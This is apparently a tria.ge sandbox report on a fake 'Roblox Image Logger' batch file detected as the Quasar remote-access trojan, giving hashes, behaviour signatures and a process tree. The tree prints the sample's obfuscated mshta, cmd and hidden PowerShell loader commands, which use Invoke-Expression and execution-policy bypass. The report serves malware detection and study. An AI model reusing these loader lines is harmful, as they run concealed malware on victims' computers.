Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
29s -
max time network
30s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
05/04/2024, 21:03
Static task
static1
General
-
Target
Roblox-Image-Logger.bat
-
Size
14.9MB
-
MD5
922173bce190a729a7541904e53ffba5
-
SHA1
d98240a8deb45581eb15e1ec4d5238f914bee80d
-
SHA256
bce1a795abd87b0db2ea2577de28ade5f46d275e47f0424fbcd728684f939c0b
-
SHA512
1b4cad22fe047018dc95825b7faaa21b0b0936f1de85886abbf5ca85b59d5fab8da35921758df62fe614e5473b664e6000a95218615bfbd41938149a07e81f5f
-
SSDEEP
49152:hx3AG5hYogP5o/nsX9xf0HFVpg0bozDhNr2IhX25cDX591URFiVmjGrEcg9FKdzt:g
Malware Config
Extracted
quasar
-
reconnect_delay
1000
Signatures
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/1528-90-0x000002A066600000-0x000002A066DAA000-memory.dmp family_quasar -
Deletes itself 1 IoCs
pid Process 444 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 4056 $sxr-mshta.exe 2332 $sxr-cmd.exe 1528 $sxr-powershell.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\$sxr-cmd.exe powershell.exe File created C:\Windows\$sxr-powershell.exe powershell.exe File opened for modification C:\Windows\$sxr-powershell.exe powershell.exe File created C:\Windows\$sxr-mshta.exe powershell.exe File opened for modification C:\Windows\$sxr-mshta.exe powershell.exe File created C:\Windows\$sxr-cmd.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 444 powershell.exe 444 powershell.exe 444 powershell.exe 444 powershell.exe 444 powershell.exe 444 powershell.exe 1528 $sxr-powershell.exe 1528 $sxr-powershell.exe 1528 $sxr-powershell.exe 1528 $sxr-powershell.exe 1528 $sxr-powershell.exe 1528 $sxr-powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 444 powershell.exe Token: SeDebugPrivilege 444 powershell.exe Token: SeDebugPrivilege 444 powershell.exe Token: SeDebugPrivilege 1528 $sxr-powershell.exe Token: SeDebugPrivilege 1528 $sxr-powershell.exe Token: SeDebugPrivilege 1528 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 2168 wrote to memory of 3360 2168 cmd.exe 77 PID 2168 wrote to memory of 3360 2168 cmd.exe 77 PID 2168 wrote to memory of 444 2168 cmd.exe 78 PID 2168 wrote to memory of 444 2168 cmd.exe 78 PID 4056 wrote to memory of 2332 4056 $sxr-mshta.exe 81 PID 4056 wrote to memory of 2332 4056 $sxr-mshta.exe 81 PID 2332 wrote to memory of 3904 2332 $sxr-cmd.exe 83 PID 2332 wrote to memory of 3904 2332 $sxr-cmd.exe 83 PID 2332 wrote to memory of 1528 2332 $sxr-cmd.exe 84 PID 2332 wrote to memory of 1528 2332 $sxr-cmd.exe 84 PID 1528 wrote to memory of 692 1528 $sxr-powershell.exe 7 PID 1528 wrote to memory of 1000 1528 $sxr-powershell.exe 12 PID 1528 wrote to memory of 468 1528 $sxr-powershell.exe 14 PID 1528 wrote to memory of 1028 1528 $sxr-powershell.exe 15 PID 1528 wrote to memory of 1100 1528 $sxr-powershell.exe 17 PID 1528 wrote to memory of 1108 1528 $sxr-powershell.exe 18 PID 1528 wrote to memory of 1176 1528 $sxr-powershell.exe 19 PID 1528 wrote to memory of 1220 1528 $sxr-powershell.exe 20 PID 1528 wrote to memory of 1268 1528 $sxr-powershell.exe 21 PID 1528 wrote to memory of 1304 1528 $sxr-powershell.exe 22 PID 1528 wrote to memory of 1360 1528 $sxr-powershell.exe 23 PID 1528 wrote to memory of 1504 1528 $sxr-powershell.exe 24 PID 1528 wrote to memory of 1576 1528 $sxr-powershell.exe 25 PID 1528 wrote to memory of 1616 1528 $sxr-powershell.exe 26 PID 1528 wrote to memory of 1628 1528 $sxr-powershell.exe 27 PID 1528 wrote to memory of 1636 1528 $sxr-powershell.exe 28 PID 1528 wrote to memory of 1728 1528 $sxr-powershell.exe 29 PID 1528 wrote to memory of 1784 1528 $sxr-powershell.exe 30 PID 1528 wrote to memory of 1828 1528 $sxr-powershell.exe 31 PID 1528 wrote to memory of 1900 1528 $sxr-powershell.exe 32 PID 1528 wrote to memory of 1956 1528 $sxr-powershell.exe 33 PID 1528 wrote to memory of 1964 1528 $sxr-powershell.exe 34 PID 1528 wrote to memory of 1340 1528 $sxr-powershell.exe 35 PID 1528 wrote to memory of 2100 1528 $sxr-powershell.exe 36 PID 1528 wrote to memory of 2120 1528 $sxr-powershell.exe 37 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:468
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1220
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-klxianqkZHcQWHMfaKQz4312:PmZbGOPN=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-klxianqkZHcQWHMfaKQz4312:PmZbGOPN=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:yWIkQKjNdX; "4⤵PID:3904
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1528
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1628
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1900
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2100
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2120
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Roblox-Image-Logger.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:wOTwUXbPCP; "2⤵PID:3360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden2⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:444
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
324KB
MD5c5db7b712f280c3ae4f731ad7d5ea171
SHA1e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89
-
Filesize
32KB
MD5356e04e106f6987a19938df67dea0b76
SHA1f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA2564ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d